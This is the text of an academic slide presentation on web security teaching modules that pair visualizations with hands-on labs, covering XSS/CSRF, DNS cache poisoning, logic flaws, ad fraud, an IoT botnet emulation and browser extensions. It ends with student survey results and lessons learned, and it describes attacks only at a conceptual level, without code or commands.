Developing Web Security Teaching Modules with Visualization and Hands-on Labs Li Yang, Carson Woods (University of Tennessee at Chattanooga Xiaohong Yuan (North Carolina A&T SU) Cyber Ed Curriculum Showcase April 23, 2018
Motivation The challenge of conveying complex and dynamic information security concepts to the students Engaging students in active learning in information security education Outline Project Overview Project Objectives Developed Modules Lessons Learned Future Work
Project Overview Web applications are profitable targets of cybercrimes. A successful attack on web applications could bypass traditional enterprise perimeters guarded by firewalls and intrusion detection systems, resulting in data loss or breach of privacy. Understanding web threats, vulnerabilities, and security is important for both users and developers. Developing visualization tools to understand web threats and security Developing hands-on labs to sharpen student skills in web security With the increased number of consumers and applications using web applications, they also become a profitable target of cybercrimes. A successful attack on web applications could bypass traditional enterprise perimeters guarded by firewalls and intrusion detection systems, resulting in data loss or breach of privacy. Understanding web threats, vulnerabilities, and security is important for both users and developers Developing visualization tools to understand web threats and security Developing hands-on labs to sharpen student skills in web security
Project Overview – Visualization Surveys suggest a widespread belief that visualization technology positively impacts learning [Naps03]. There has been growing evidence showing concept visualization systems are indeed effective when they engage learners in an active learning activity [Grissom03, Naps03]. Students will benefit from the interactive visualization as one of the active learning approaches, which involve students in the classroom in activities that are meaningful and make them think about what they are doing [Bonwell91].
Teaching Modules in Web Security IoT Bonet DNS Cache Poisoning and Pharming Attack and Defense Cross-Site Scripting (XSS) & Cross-site Request Forgery (CSRF) Web Security Visualization + Lab Logic Flaw Browser Extensions Ad Fraud Top Vulnerabilities, News, emerging, Complex, Abstract, Dynamic Time-constraints
Module 1 Cross-Site Scripting (XSS) & Cross-site Request Forgery (CSRF) Cross-site scripting (XSS) a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into the victim’s web browser. Using this malicious code, the attackers can steal the victim’s credentials, such as cookies, and bypass access control policies. Visualization: Normal web operation Vulnerabilities and attacks Defense strategies
Cross-Site Scripting (XSS) Visualization Samples Figure 1 (a) Mel Steals Cookies from Alice (b) Mel impersonates Alice with Alice’s Cookie
Module 2 DNS Cache Poisoning and Pharming Three players: a user, a DNS server, and an attacker Normal operation of DNS Several attack scenarios: Cache Poisoning and Pharming A defense solution such as HTTPS
Module 3 Logic Flaw Lecture Topics: API parameters in e-commerce Arguments in URLs Workflow of transactions How to complete complete an expensive order using the payment intended for a cheap order Hands-on Labs Implement logic flaw
Logic Flaw Visualization
Module 4 Ad Fraud Lecture Topics: How online advertisement works Ad Replacement Attack Click Hijacking Attack Ad Fraud Mitigation Techniques: Serve Bluff Ads, Threshold based detection, Monitoring and Scrutinizing unexpected DNS resolvers Visualization Ad Replacement Click Hijacking Hands-on Labs: Students will simulate ad replacement fraud
Ad Replacement Visualization
Module 5 IoT Botnet Topics Visualization Hands-on Lab IoT, DoS, password Visualization Hands-on Lab Students emulate the Mirai Command & Control (C&C) server, infect devices, and perform a DoS on a local LAMP server hosting a website. Mirai Botnet
Module 6 Browser Extensions 1. 2. Topics: What is Browser extension? Security implication of browser extension Visualization (to come) Hands-on Lab Write browser extension 3.
User Study of Visualization Tools on XSS and CSRF Ten students participated in the survey. From North Carolina A&T State University in the Secure Software Engineering class On the average, students spent about 20 minutes on each tool.
Evaluate Hands-on Labs Fifteen (15) students were enrolled in the class, and thirteen (13) students participated in the survey. Students had 10 days to work on the hands-on lab of ad replacement attack. Most of the students consider themselves as having excellent and high knowledge in different learning outcomes after using the hands-on lab on ad fraud. Secure Software Engineering class at North Carolina A&T State University in spring 2016
Demo XSS: http://web2. utc. edu/~djy471/XSS/xss Demo XSS: http://web2.utc.edu/~djy471/XSS/xss.html Logic Flaw: http://web2.utc.edu/~djy471/logic-flaw/index.html
Lessons Learned Good developers are important (manpower) Recruit as early as possible (manpower) Develop compelling stories (expertise) Need a designer or experts in graphics (expertise/budget) Plan for course integration (expertise) User study and testing are important (budget/time)
Future Work Network Security Secure Coding Software Vulnerability: BoF, Race Condition Wireless Security Cryptography Emerging Incidents